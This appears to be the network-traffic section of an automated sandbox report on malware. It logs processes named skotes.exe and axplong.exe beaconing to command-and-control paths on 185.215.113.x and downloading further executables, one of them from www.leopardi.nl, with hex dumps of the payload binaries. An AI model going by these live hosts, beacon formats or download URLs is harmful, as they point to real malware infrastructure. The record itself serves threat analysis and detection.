                                                      Sep 24, 2024 15:37:34.841332912 CEST1236INData Raw: 15 3c 92 f3 00 89 02 89 44 24 08 a1 20 90 8c 00 89 44 24 04 a1 24 90 8c 00 89 04 24 e8 3d 84 15 00 8b 0d 14 90 8c 00 a3 18 90 8c 00 85 c9 0f 84 f2 00 00 00 8b 15 10 90 8c 00 85 d2 0f 84 a1 00 00 00 8d 65 f0 59 5b 5e 5f 5d 8d 61 fc c3 8d 74 26 00
                                                      Data Ascii: <D$ D$$$=eY[^_]at&E&f$9GfD$$Gff&v$O&GeY[^
                                                      Sep 24, 2024 15:37:34.841340065 CEST448INData Raw: c9 c3 55 89 e5 83 ec 18 8b 45 08 8b 40 04 8b 10 8b 45 08 8b 00 8b 00 89 54 24 04 89 04 24 e8 2e 45 06 00 8b 45 08 c7 40 08 00 00 00 00 90 c9 c3 55 89 e5 8b 45 08 8b 40 20 8b 00 c6 00 8a 8b 45 08 c7 40 28 03 00 00 00 90 5d c3 55 89 e5 83 ec 28 c7
                                                      Data Ascii: UE@ET$$.EE@UE@ E@(]U(E@E@EED!ED$E$tEEDUEE@E@]UxEFEWQEEEEEEEEEEEE
                                                      Sep 24, 2024 15:37:34.841389894 CEST1236INData Raw: 89 4d e4 8b 45 08 8b 40 6c 8b 00 8b 18 89 5d e0 8b 45 08 8b 40 5c 8b 00 8b 30 89 75 dc 8b 45 08 8b 80 f8 00 00 00 8b 00 8b 38 89 7d d8 8b 45 08 8b 80 04 01 00 00 8b 00 8b 00 89 45 d4 8b 45 08 8b 40 48 8b 00 dd 00 8b 45 08 8b 80 a4 00 00 00 8b 00
                                                      Data Ascii: ME@l]E@\0uE8}EEE@HEME@XE@]E@H]E@<]E]E@0uE@<E@,8}E@pEE@XE@E@EME
                                                      Sep 24, 2024 15:37:34.841398001 CEST1236INData Raw: 08 8d 45 dc 89 44 24 04 8d 45 20 89 04 24 e8 35 9c 08 00 8d 45 c4 89 44 24 14 8d 45 ca 89 44 24 10 8d 45 dc 89 44 24 0c 8d 45 e4 89 44 24 08 8d 45 e8 89 44 24 04 8d 45 f4 89 04 24 e8 71 f6 07 00 8d 45 c4 89 44 24 68 8d 45 cc 89 44 24 64 8d 45 d0
                                                      Data Ascii: ED$E $5ED$ED$ED$ED$ED$E$qED$hED$dED$`ED$\ED$XED$TED$PED$LED$HD$DD$@xD$<D$8D$4D$0E|D$,EpD$(ElD$$ED$ E0D$E,D$E(D$E$D$
                                                      Sep 24, 2024 15:37:34.841403961 CEST1236INData Raw: 00 5b 5e 5f 5d c3 55 89 e5 83 ec 78 8b 45 08 89 45 e0 8b 45 0c 89 45 e4 8b 45 24 89 45 d8 8b 45 28 89 45 dc 8b 45 30 89 45 d0 8b 45 34 89 45 d4 8b 45 3c 89 45 c8 8b 45 40 89 45 cc 8b 45 44 89 45 c0 8b 45 48 89 45 c4 8b 45 54 89 45 b8 8b 45 58 89
                                                      Data Ascii: [^_]UxEEEEE$EE(EE0EE4EE<EE@EEDEEHEETEEXEE\EE`EEpEEtEE|EEED$$xgED$D$$5EUE]UE@]UE
                                                      Sep 24, 2024 15:37:34.841412067 CEST104INData Raw: 03 00 00 00 8d 45 08 89 45 ec 8b 45 f0 83 f8 03 77 11 8b 45 f0 8b 44 85 dc 8d 55 ec 89 14 24 ff d0 eb e7 90 c9 c3 55 89 e5 83 ec 28 c7 45 f4 00 00 00 00 83 7d f4 00 74 08 83 7d f4 01 75 1d eb 1e 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 4e ae 0b
                                                      Data Ascii: EEEwEDU$U(E}t}uED$E$NEU8
                                                      Sep 24, 2024 15:37:34.841415882 CEST1236INData Raw: 45 ec 3a 29 40 00 c7 45 f0 0b 29 40 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44 85 ec 90 ff e0 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 0d f4 44 00 90 90 c9 c3 55 89
                                                      Data Ascii: E:)@E)@EEDED$ED$ED$ED$ED$E$DUWVSE@8EE@4UE@@ME@]E@0uE@D8}E@<UE@(ME@ ]E@00uE@,8}E@
                                                      Sep 24, 2024 15:37:34.847428083 CEST1236INData Raw: 00 8b 45 e0 89 84 24 88 00 00 00 d9 e8 dd 9c 24 80 00 00 00 8b 45 dc 89 44 24 7c dd 05 c0 ac 88 00 dd 5c 24 74 8b 45 d8 89 44 24 70 8b 45 d4 89 44 24 6c 8b 45 d0 89 44 24 68 d9 e8 dd 5c 24 60 c7 44 24 5c 09 00 00 00 8b 45 cc 89 44 24 58 8b 45 c8
                                                      Data Ascii: E$$ED$|\$tED$pED$lED$h\$`D$\ED$XED$TED$PED$LED$HED$DED$@D$<\$4|$0t$,\$$L$ T$\$\$\$$4FE@ [^_]UHEKE


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      143192.168.2.749916185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:34.286900997 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:34.973643064 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      144192.168.2.749917185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:36.943250895 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:37.643222094 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      145192.168.2.749918185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:39.160738945 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:39.865005016 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      146192.168.2.749919185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:41.526892900 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:42.234638929 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      147192.168.2.749920185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:41.864727020 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 33 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000321001&unit=246122658369
                                                      Sep 24, 2024 15:37:42.615921021 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      148192.168.2.749921185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:42.626530886 CEST58OUTGET /inc/newbundle2.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:37:43.324932098 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:43 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 311296
                                                      Last-Modified: Sun, 22 Sep 2024 20:59:29 GMT
                                                      Connection: keep-alive
                                                      ETag: "66f08531-4c000"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @ @O h H.text `.rsrc @@.reloc@B
                                                      Sep 24, 2024 15:37:43.324954987 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 b9 02 00 00 00 00 00 48 00 00 00 02 00 05 00 54 2d 01 00 1c 80 01 00 03 00 00
                                                      Data Ascii: HT-Mp01s,~%-&~ls-%(+o/8o0%r
                                                      Sep 24, 2024 15:37:43.324965954 CEST1236INData Raw: 01 00 00 70 72 59 00 00 70 7e 31 00 00 0a 28 32 00 00 0a a2 25 17 72 71 00 00 70 72 af 00 00 70 7e 31 00 00 0a 28 32 00 00 0a a2 25 18 72 c7 00 00 70 72 07 01 00 70 7e 31 00 00 0a 28 32 00 00 0a a2 25 19 72 21 01 00 70 72 61 01 00 70 7e 31 00 00
                                                      Data Ascii: prYp~1(2%rqprp~1(2%rprp~1(2%r!prap~1(2(o381(4s_sm~1}~1s5(6o7}{rqprp~1(2o8,rprp~1(2+;
                                                      Sep 24, 2024 15:37:43.324981928 CEST1236INData Raw: 69 01 00 06 00 25 11 11 6f 6b 01 00 06 00 25 73 56 00 00 0a 6f 65 01 00 06 00 25 73 57 00 00 0a 6f 67 01 00 06 00 13 1b 06 11 1b 6f 58 00 00 0a 00 00 11 10 28 09 00 00 2b 13 1c 11 1c 2c 64 00 73 6d 01 00 06 25 11 08 6f 5f 01 00 06 00 25 11 0b 72
                                                      Data Ascii: i%ok%sVoe%sWogoX(+,dsm%o_%rp(>oa%sUoc%oi%ok%sVoe%sWogoXol,oX(Y:oZo[:%
                                                      Sep 24, 2024 15:37:43.324985027 CEST1236INData Raw: 00 00 01 02 00 00 00 7a 00 00 00 52 00 00 00 cc 00 00 00 6f 00 00 00 00 00 00 00 00 00 00 00 43 00 00 00 38 01 00 00 7b 01 00 00 06 00 00 00 1a 00 00 01 00 00 00 00 07 00 00 00 7d 01 00 00 84 01 00 00 06 00 00 00 1a 00 00 01 1b 30 05 00 cc 01 00
                                                      Data Ascii: zRoC8{}0s?(\(],(s%(`sao&8Css%oo^ov%oo^o:.ox
                                                      Sep 24, 2024 15:37:43.324989080 CEST1236INData Raw: 00 06 6f 5e 00 00 0a 6f 84 01 00 06 00 25 11 05 11 06 18 6f 18 01 00 06 6f 5e 00 00 0a 28 6b 00 00 0a 6f 86 01 00 06 00 25 11 05 11 06 19 6f 18 01 00 06 6f 5e 00 00 0a 28 6b 00 00 0a 6f 88 01 00 06 00 25 11 05 11 06 1a 6f 18 01 00 06 08 28 07 00
                                                      Data Ascii: o^o%oo^(ko%oo^(ko%o(rp~1o2o&,olXo:K+*ALr}A&
                                                      Sep 24, 2024 15:37:43.325001955 CEST1236INData Raw: 00 01 25 d0 b4 02 00 04 28 60 00 00 0a 0d 07 08 6f 7a 00 00 0a 00 07 09 6f 7a 00 00 0a 00 07 6f 7b 00 00 0a 73 61 00 00 0a 72 c1 03 00 70 7e 31 00 00 0a 28 32 00 00 0a 13 04 11 04 28 7c 00 00 0a 13 05 28 7d 00 00 0a 11 05 6f 72 00 00 0a 13 06 11
                                                      Data Ascii: %(`ozozo{sarp~1(2(|(}orrp(~((],(o(],(o&+*ACJ0sUsso
                                                      Sep 24, 2024 15:37:43.325093031 CEST1236INData Raw: 58 00 00 0a 00 00 12 04 28 59 00 00 0a 3a 31 ff ff ff de 0f 12 04 fe 16 06 00 00 1b 6f 5a 00 00 0a 00 dc 00 de 05 26 00 00 de 00 00 07 6f 5b 00 00 0a 3a a9 fe ff ff de 0b 07 2c 07 07 6f 5a 00 00 0a 00 dc 00 de 06 13 0b 00 00 de 00 06 13 0c 2b 00
                                                      Data Ascii: X(Y:1oZ&o[:,oZ+*AdsI>[^nu|0s?(}%(`sarp~1
                                                      Sep 24, 2024 15:37:43.325103045 CEST1236INData Raw: 00 00 0a 13 09 16 13 0a 38 96 01 00 00 11 09 11 0a 9a 13 0b 00 00 11 0b 6f 37 00 00 0a 1f 13 8d b3 00 00 01 25 d0 c7 02 00 04 28 60 00 00 0a 73 61 00 00 0a 72 e3 03 00 70 7e 31 00 00 0a 28 32 00 00 0a 28 5c 00 00 0a 13 0c 11 0c 28 5d 00 00 0a 13
                                                      Data Ascii: 8o7%(`sarp~1(2(\(]9:so(},%(`sa(|orooo(},%(`sa(|orooo(K-(K
                                                      Sep 24, 2024 15:37:43.325114965 CEST1236INData Raw: 00 17 0b 2b 1d 02 2c 06 03 14 fe 01 2b 01 17 0c 08 2c 05 00 16 0b 2b 0a 02 03 28 1f 00 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 2d 00 00 00 15 00 00 11 00 02 03 fe 01 0a 06 2c 05 00 17 0b 2b 1d 02 2c 06 03 14 fe 01 2b 01 17 0c 08 2c 05 00 16 0b
                                                      Data Ascii: +,+,+(+*0-,+,+,+( +*0-,+,+,+(!+*0(+*0>ii,+%+Ya`
                                                      Sep 24, 2024 15:37:43.329986095 CEST1236INData Raw: 00 06 00 2a 7a 00 03 16 02 d2 9c 03 17 02 1e 64 d2 9c 03 18 02 1f 10 64 d2 9c 03 19 02 1f 18 64 d2 9c 2a b6 00 03 04 02 d2 9c 03 04 17 58 25 10 02 02 1e 64 d2 9c 03 04 17 58 25 10 02 02 1f 10 64 d2 9c 03 04 17 58 25 10 02 02 1f 18 64 d2 9c 2a 00
                                                      Data Ascii: *zddd*X%dX%dX%d*0b`b`b`+*0,X%b`X%b`X%b`+*0(2(3n bn`+*0(3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      149192.168.2.749922185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:44.021883011 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:44.505405903 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.74992546.19.218.2044437308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-24 13:37:46 UTC64OUTGET /frm/_vti_cnf/Blenar.exe HTTP/1.1
                                                      Host: www.leopardi.nl
                                                      2024-09-24 13:37:46 UTC272INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 24 Sep 2024 13:37:46 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 5492542
                                                      Last-Modified: Tue, 24 Sep 2024 04:41:11 GMT
                                                      Connection: close
                                                      ETag: "66f242e7-53cf3e"
                                                      X-Powered-By: PleskLin
                                                      Accept-Ranges: bytes
                                                      2024-09-24 13:37:46 UTC16112INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5d 90 4e cd 19 f1 20 9e 19 f1 20 9e 19 f1 20 9e ad 6d d1 9e 15 f1 20 9e ad 6d d3 9e b2 f1 20 9e ad 6d d2 9e 01 f1 20 9e 22 af 23 9f 0b f1 20 9e 22 af 25 9f 04 f1 20 9e 22 af 24 9f 0b f1 20 9e c4 0e eb 9e 10 f1 20 9e 19 f1 21 9e 6d f1 20 9e 8b af 24 9f 08 f1 20 9e 8b af df 9e 18 f1 20 9e 8b af 22 9f 18 f1 20 9e 52 69 63 68 19 f1 20 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$]N m m m "# "% "$ !m $ " Rich
                                                      2024-09-24 13:37:46 UTC16384INData Raw: 89 44 24 10 85 c0 74 4f 8d 48 01 6a 01 51 e8 5b 8d 00 00 83 c4 08 8b d8 6a 00 6a 00 ff 74 24 18 53 6a ff ff 74 24 28 6a 00 68 e9 fd 00 00 ff 15 58 00 42 00 85 c0 74 18 89 1e 85 db 74 31 8b 5c 24 1c 47 83 c6 04 3b fb 7d 4f 8b 44 24 20 eb 91 68 7c 17 42 00 eb 05 68 58 17 42 00 68 20 17 42 00 e8 aa cd ff ff c7 06 00 00 00 00 83 c4 08 33 f6 85 ff 78 11 ff 74 b5 00 e8 e8 50 00 00 46 83 c4 04 3b f7 7e ef 55 e8 da 50 00 00 83 c4 04 33 c0 5f 5e 5d 5b 83 c4 08 c3 5f 5e c7 44 9d 00 00 00 00 00 8b c5 5d 5b 83 c4 08 c3 cc cc cc cc cc 83 ec 38 a1 08 c0 42 00 33 c4 89 44 24 34 0f 10 05 00 18 42 00 56 8b 74 24 40 8d 44 24 08 0f 11 44 24 10 6a 00 0f 10 05 10 18 42 00 50 6a 01 0f 11 44 24 2c 8d 44 24 1c c7 44 24 10 0c 00 00 00 f3 0f 7e 05 20 18 42 00 50 66 0f d6 44 24 40
                                                      Data Ascii: D$tOHjQ[jjt$Sjt$(jhXBtt1\$G;}OD$ h|BhXBh B3xtPF;~UP3_^][_^D][8B3D$4BVt$@D$D$jBPjD$,D$D$~ BPfD$@
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 00 00 23 cf ba ff ff ff ff d3 e2 66 0f d7 f8 23 fa 75 14 66 0f ef c0 66 0f 74 40 10 83 c0 10 66 0f d7 f8 85 ff 74 ec 0f bc d7 03 c2 eb bd 8b 7d 08 33 c0 83 c9 ff f2 ae 83 c1 01 f7 d9 83 ef 01 8a 45 0c fd f2 ae 83 c7 01 38 07 74 04 33 c0 eb 02 8b c7 fc 5f c9 c3 cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 94 02 00 00 83 f9 20 0f 82 d2 04 00 00 81 f9 80 00 00 00 73 13 0f ba 25 20 c0 42 00 01 0f 82 8e 04 00 00 e9 e3 01 00 00 0f ba 25 c0 9d 43 00 01 73 09 f3 a4 8b 44 24 0c 5e 5f c3 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 20 c0 42 00 01 0f 82 e0 03 00 00 0f ba 25 c0 9d 43 00 00 0f 83 a9 01 00 00 f7 c7 03 00 00 00 0f 85 9d 01 00 00 f7 c6 03 00 00 00 0f 85 ac 01 00 00 0f ba e7 02 73 0d 8b 06 83
                                                      Data Ascii: #f#ufft@ft}3E8t3_WVt$L$|$;v; s% B%CsD$^_3u% B%Cs
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 8b 45 08 66 89 01 8b 02 83 00 02 b0 01 5d c2 08 00 8b ff 55 8b ec 83 ec 10 a1 08 c0 42 00 33 c5 89 45 fc 53 56 8b f1 57 80 7e 3c 00 74 5d 8b 46 38 85 c0 7e 56 8b 7e 34 33 db 85 c0 74 65 0f b7 07 8d 7f 02 83 65 f0 00 50 6a 06 8d 45 f4 50 8d 45 f0 50 e8 72 77 00 00 83 c4 10 85 c0 75 26 39 45 f0 74 21 ff 76 0c 8d 46 18 50 ff 75 f0 8d 45 f4 50 8d 8e 48 04 00 00 e8 c6 00 00 00 43 3b 5e 38 75 bb eb 1e 83 4e 18 ff eb 18 ff 76 0c 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 a0 00 00 00 8b 4d fc b0 01 5f 5e 33 cd 5b e8 c2 ae ff ff 8b e5 5d c2 04 00 8b ff 55 8b ec 51 51 53 56 8b f1 57 80 7e 3c 00 75 56 8b 46 38 85 c0 7e 4f 8b 5e 34 33 ff 85 c0 74 5e 33 c0 66 89 45 fc 8b 46 08 50 8b 00 ff 70 04 8d 45 fc 53 50 e8 a2 74 00 00 83 c4 10 89 45 f8 85 c0 7e 1d 8d 4e
                                                      Data Ascii: Ef]UB3ESVW~<t]F8~V~43teePjEPEPrwu&9Et!vFPuEPHC;^8uNvFPv8Hv4M_^3[]UQQSVW~<uVF8~O^43t^3fEFPpESPtE~N
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 08 c6 42 00 3b c6 74 0d 50 e8 13 01 00 00 59 89 35 28 c8 42 00 ff 35 1c a3 43 00 e8 01 01 00 00 ff 35 20 a3 43 00 33 f6 89 35 1c a3 43 00 e8 ee 00 00 00 ff 35 80 9e 43 00 89 35 20 a3 43 00 e8 dd 00 00 00 ff 35 84 9e 43 00 89 35 80 9e 43 00 e8 cc 00 00 00 83 c4 10 89 35 84 9e 43 00 b0 01 5e c3 68 c8 50 42 00 68 50 50 42 00 e8 1e 7e 00 00 59 59 c3 68 c8 50 42 00 68 50 50 42 00 e8 8f 7e 00 00 59 59 c3 8b ff 55 8b ec 8b 4d 10 8b 45 0c 81 e1 ff ff f7 ff 23 c1 56 8b 75 08 a9 e0 fc f0 fc 74 24 85 f6 74 0d 6a 00 6a 00 e8 e1 80 00 00 59 59 89 06 e8 77 c2 ff ff 6a 16 5e 89 30 e8 df 0d 00 00 8b c6 eb 1a 51 ff 75 0c 85 f6 74 09 e8 bd 80 00 00 89 06 eb 05 e8 b4 80 00 00 59 59 33 c0 5e 5d c3 6a 0c 68 58 a5 42 00 e8 af e8 00 00 e8 63 3a 00 00 8b 70 0c 85 f6 74 1e 83 65
                                                      Data Ascii: B;tPY5(B5C5 C35C5C5 C5C5C5C^hPBhPPB~YYhPBhPPB~YYUME#Vut$tjjYYwj^0QutYY3^]jhXBc:pte
